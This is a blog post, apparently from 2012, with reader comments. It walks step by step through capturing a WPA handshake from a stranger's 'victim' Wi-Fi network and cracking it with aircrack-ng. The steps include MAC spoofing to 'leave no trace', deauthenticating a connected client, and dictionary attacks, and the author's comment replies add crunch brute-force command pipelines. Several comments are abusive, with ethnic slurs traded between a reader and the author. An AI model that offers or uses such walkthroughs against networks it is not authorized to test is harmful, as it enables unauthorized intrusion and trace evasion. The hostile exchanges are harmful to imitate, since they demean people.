jump to navigation

Hacking Wireless Router WPA BackTrack 5 March 16, 2012

Posted by hasnain110 in Uncategorized.
trackback

 

 

 

Guys Here is a quick How-to of cracking any wireless network. I will keep things simple stupid.

Requirement:

A PC installed with Linux Backtrack 5 RC2

Working Wireless LAN Card Installed (Of course) Smile

Updated Dictionary File with password (Do google if you do not know about it )

Goto any open area to find the victim

Step 1:

Run this command to check available Wlan adapters.

airmon-ng

It should give you output something like below.

 

1

Now we know that we have only one wireless interface wlan0 lets proceed to step 2

 

Step 2:

Now lets try to start the airmon service on the interface that we have just found in Step 1. Run the give command

airmon-ng start wlan0

2

Ignore the errors mentioned above in my case it did not create any trouble for me but you might want to kill the conflicting services if results are different then mine. By second step we have started the service/monitor on WLAN0 now we should have additional monitoring interface on the system. You can check if a new interface mon0 is added on your system or not by using command ifconfig else try the step 3

Step 3:

You should see another monitoring interface mon0 on your system by using command ifconfig or you can the same command we did on Step 1

3

Here we can see the new monitoring interface mon0

Step 4:

A good hacker is always suppose to leave no trace back of his break-in.If you run the command ifconfig and notice you will find that the monitoring interface mon0 and Wireless interface Wlan0 are sharing the same MAC address. In actual mon0 is sharing the same mac address as Wlan0. check the pic below

4

Now we have to put a fake mac address on the monitoring interface to leave no trace.Lets make the mon0 interface down by running the command

ifconfig mon0 down

Next lets change the MAC address of mon0 interface by running the below command

macchanger –m 00:11:22:33:44:55 mon0

5

The output actually shows the old and new Fake mac address.Now since we have changed the MAC address on MON0 lets bring the interface back up again using the below command

ifconfig mon0 up

Now just to be sure lets run the same command ‘ifconfig’ that we have already used earlier above in Step 4

ifconfig

6

Here we can see we have sucessfully changed the MAC address for our monitoring interface mon0

Step 5:

Lets start dumping the available wireless information. run the below command

airodump-ng mon0

7

 

Here my Victim router ESSID is AndroidHotSpot. The information that I need from here is

BSSID MAC details: D0:C1: B1:5B:AC:33

CHANNEL: 6

Step 6:

By now we have identified our victim its time to further narrow down this network. We need to know how many workstation/terminal connected to this wireless. Run this command with your network information that you obtained in Step 5:

airodump-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE

8

Here I can see that one client having mac address highlighed in green is connected to this hotspot. To find the password either you need to be patient to wait another client connect to this hotspot but time is money lets force this client to reconnect and make the handshake auth with the server so that we can take the packets

Note: Keep this ssh session close and open another terminal for Step 7. Do not close the existing session

Step 7:

Lets force the already connected session to make a auth handshake again

Run the given below command in the new terminal session

aireplay-ng –0 –4 –a  MAC-ADDR-OF-ROUTER –c MAC-ADDR-OF-CLIENT mon0

9

Final Step:

Now finally we have all the dump saved in the working directory we just need to crack the packet capture using dictionary file. Run the below command

aircrack-ng crackwpa-01.cap –w list

** crackwpa-01.cap is the filename of the capture packet

** list if the my dictionary file name

10

 

Kabooom ! You got the security Key !

I personally think the key to success is the dictionary list that you have

Hope you will enjoy my pretty simple steps to crack a secured Wireless Smile

About these ads

Comments»

1. Hafeez - March 17, 2012

I have creaked a lot of WEP W-lan using this method but breaking of WPA security with this is some difficult without dictionaries.

hasnain110 - March 23, 2012

Try this command to make it a brute-force not dictionary attack

./crunch 8 8 12345678 -t 1223@@@@ | aircrack-ng -b 20:2B:C1:F5:3C:68 -w – /root/newlatino-01.cap

This is example of only numeric password where I know the initial 4 digits of the password. You can use it for alpa-numeric and special characters as well please refer to man of crunch for much more details

2. Maki - March 21, 2012

This is the right blog for anyone who wants to find out about this topic. You realize so much its almost hard to argue with you (not that I actually would want…HaHa). You definitely put a new spin on a topic thats been written about for years. Great stuff, just great!

http://www.smallbusinessplansoftware.net/

3. ebay123justdoit - July 6, 2012

Reblogged this on WIRELESS.

4. Sumit - July 24, 2012

I installed backtrack 4 but when i try to run it says wireless adapter not found

5. Hasnain - August 4, 2012

make sure you have necessary drivers installed for your WLAN card and its fully functional in the system . simply run the command ifconfig wlan0 up ..if it execute without any output then next command type ifconfig wlan0 this time if it shows your details of interface means your WLAN is funcional

bulaknu - December 11, 2013

me also got a problem ,,how can i get that driver???

6. dm ivy - September 5, 2012

i installed backtrack5 and its video isnt showing . how do i go about this?

hasnain110 - February 8, 2013

I think you are talking about the GUI of the BT. you just need to type the command startx to invoke the GUI

7. port scanner - February 8, 2013

hi hasnain majid here yar web server attack k bary main kuch tip do airmitage k elawa kohi tool batahoo jo backtrak5 main web explotion maddad kary ok

hasnain110 - February 8, 2013

Hi Majid! It actually depends on what do you need to exploit and how do you need it to be done. I might be able to guide you a little if you can narrow down your query more a bit

8. Ahmed fawzy - February 21, 2013

please…i need a specific requirements and tools for hacking WPA and how to setup all of them..?

hasnain110 - February 28, 2013

just install Backtrack and you will have all tool built-in

9. Ahmed fawzy - March 6, 2013

Thank you Hasnain..:)…if you have a little video for how to setup these it would be great… actually i got a wireless card and i got backtrack 5…but..i don;t know how to setup all of this with each other..

10. hasnain110 - March 6, 2013

well it would be hard for making video as I usually do not get much time ..but as long as you have working Wireless and BT5 all you need is to follow the steps mentioned above nothing else ..should be pretty simple!

zuco - April 16, 2013

Will it all work with bt5r3

11. hasnain110 - April 16, 2013

yes it should be working . I did not tried the latest one my self

You might need to find the files located in different paths

12. anonymous - May 16, 2013

fucking asshole u dont khnow what you are u doing.u bloody pakistani.go to hell u bitch.

hasnain110 - May 16, 2013

At first you anonymous INDIA Bastard. No one invited you to visit blog ! Secondly you came here to see what your retard brain cant do in ages! Last I guess I know lot more then what you know…Get Lost ..this blog I maintian for wanna be geeks not for PEE DRINKERS Like you!

13. hack for facebook - May 29, 2013

Hmm it seems like your site ate my first comment (it was super long) so I guess I’ll just sum it up what I had written and say, I’m
thoroughly enjoying your blog. I too am an aspiring blog blogger but I’m still new to the whole thing. Do you have any helpful hints for beginner blog writers? I’d certainly appreciate it.

14. hammad - June 19, 2013

how to add my disctionary file in back track please telme in detail i did all this but i want add my dictionary file here in backtrack .or wat if i have more than one wordlist,how to add more wordlist files in backtrack plz reply

15. hammad - June 19, 2013

how to add my disctionary file in back track please telme in detail i did all this but i want add my dictionary file here in backtrack .or wat if i have more than one wordlist,how to add more wordlist files in backtrack plz reply.

16. hgw - August 11, 2013

Hi Ali,
To step 6 everything is ok. But if your victim router is this: BSSID MAC details: D0:C1: B1:5B:AC:33, why do you issue the command airodump-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE in step 6?

hasnain110 - September 6, 2013

Probably is Typo/wrong screen shot paste …Its just for understanding purpose

chevy - September 6, 2013

Is this for wep only or any strong signal that comes on the screen

hasnain110 - September 6, 2013

never tried on all type..but should be for any ..better google..

17. danish - August 27, 2013

salam great blog bro
sir i want to know how i get dictionary files n how i put in backtrack 5r

hasnain110 - September 6, 2013

there are plenty of tools available to create a dictionary files you can google for them . Just put that .txt file into your system and use it with what ever command you want to use to crack

chevy - September 6, 2013

I run backtrack from a DVD a boot up…is it better to install it o. A hard drive? If yes what is the safest way to install bt into your laptop which has windows 7

hasnain110 - September 6, 2013

not really needed to install I prefer using a bootable usb thats the quickest for me

chevyeasy@aol.com - September 7, 2013

is the usb the same as a dvd ? how do I transfer the files to a flas drive and make the flash drive bootable

hasnain110 - September 7, 2013

google unetbootin

18. chevy Heurte - September 4, 2013

Hi, I’m new to this…. please help…. if I boot from dvd and one terminal is running as in step 6….how can I open a new terminal to run a different command for step 7…. is the a command in BT that I can use or am I doing something wrong or missing something

hasnain110 - September 6, 2013

simply press Ctrl+Alt+t to open another TAB in the same terminal window

chevy - September 7, 2013

I press ctrl+alt+t and I was not able to open another terminal to complete step 7 ……what am I doing wrong

hasnain110 - September 7, 2013

sorry my bad CTRL+Shift+t

chevy - September 7, 2013

CTRL shit t does not work to open a new terminal for step 7…..i boot to a dvd

19. chevy - September 6, 2013

I stayed on for 3days to get 20000 data and finally I got an error dictionary not found

hasnain110 - September 6, 2013

thats because of your dictionary file …remember patience and dictionary file is the key

20. danish - September 7, 2013

sir plz suggest any gud tool for add dictioary in back track 5r

hasnain110 - September 7, 2013

Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w –

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

danish - September 8, 2013

thanx alot sir

21. frank - September 26, 2013

Hello, im running the backtrack 5 using VMWare on windows 7, after the first command airmon-ng, no chipset detected and i cannot proceed to the next step. im using atheros AR2985. any solution? Tq

22. Alan - September 30, 2013

hi,

when i run this command “airodump-ng mon0″, after 20min waiting there is still no any available wireless information, any reason?

23. sadasda - December 11, 2013

what the fuck are u asshole,,,u just give this form to allow us to reply or give feedback,,,but y dont u reply any one of us,,,u fucking asshole ,,shit,,puiii,,,

24. sadasda - December 11, 2013

fuck u asshole,,,fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck youuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu……………………………………..

hasnain110 - December 23, 2013

I run this blog when I have time , its a free of charge free sharing service. I have to right to reply when I have time. I do not do spoon feeding here. Get another blog for your queries. Abuse will not do any good !

25. see kiong - July 31, 2014

you die first before the password comes up


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 35 other followers

%d bloggers like this: